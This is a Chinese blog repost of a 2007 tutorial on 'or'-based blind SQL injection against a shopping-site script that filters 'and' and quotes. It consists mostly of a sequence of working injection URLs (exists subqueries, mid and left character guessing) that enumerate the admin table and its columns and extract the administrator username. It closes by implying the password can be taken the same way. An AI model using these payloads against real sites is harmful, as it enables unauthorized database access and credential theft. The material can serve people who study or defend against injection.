关闭

假是真时真是假——or注入教程

标签: 测试脚本
895人阅读 评论(1) 收藏 举报
分类:
来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:文章首发脚本安全小组论坛(www.Cnsst.Org),后由原创作者友情提交到邪恶八进制信息安全团队,转载请注明首发站点。

PS:很久的文章了,07年4月的,最近找到修改了下就发上来,文章有些乱,请大家不要见怪

  记得一年前火狐有一位朋友问,如果一个站过滤了and和“'”的话,改怎么注入啊?当时我随口说了句“or注入”,后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。
  我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的“假是真时真是假”,比lake2大哥哥的IP欺骗更经典哦,呵呵。
  我们来构造测试语句:
Copy code

    vpro.asp?id=1 or exists(select * from admin)

返回错误页面,说明存在admin表我们来换一个表试试!
  
Copy code

    vpro.asp?id=1 or exists(select * from n0h4ck)

说明不存在n0h4ck这个表。
    我们继续来,构造语句
Copy code

    vpro.asp?id=1 or exists(select admin from admin)

返回or 1=1的页面,说明admin表存在admin字段。
  
Copy code

    vpro.asp?id=1 or exists(select padd from admin)

返回or 1=2的页面,说明admin表不存在padd字段。
  我们现在开始猜测数据了,
Copy code

    vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'

返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是“n”。
    我们再来
Copy code

    vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'

返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是“a”,我们第一个会想到什么呢?当然是“admin”啦。
    我们用left函数确定一下,
Copy code

    vpro.asp?id=1 or (select left(admin,5) from admin)='admin'

猜测正确,的确是admin,好了,后面的话就不用我说了吧!
0
0

猜你在找
【直播】计算机视觉原理及实战—屈教授
【套餐】深度学习入门视频课程—唐宇迪
【套餐】Hadoop生态系统零基础入门--侯勇蛟
【套餐】嵌入式Linux C编程基础--朱有鹏
【套餐】2017软考系统集成项目——任铄
【套餐】Android 5.x顶级视频课程——李宁
【直播】广义线性模型及其应用——李科
【直播】从0到1 区块链的概念到实践
【直播】机器学习之凸优化——马博士
【套餐】微信订阅号+服务号Java版 v2.0--翟东平
查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:89986次
    • 积分:1160
    • 等级:
    • 排名:千里之外
    • 原创:36篇
    • 转载:0篇
    • 译文:0篇
    • 评论:7条
    最新评论
    黑客安全类知识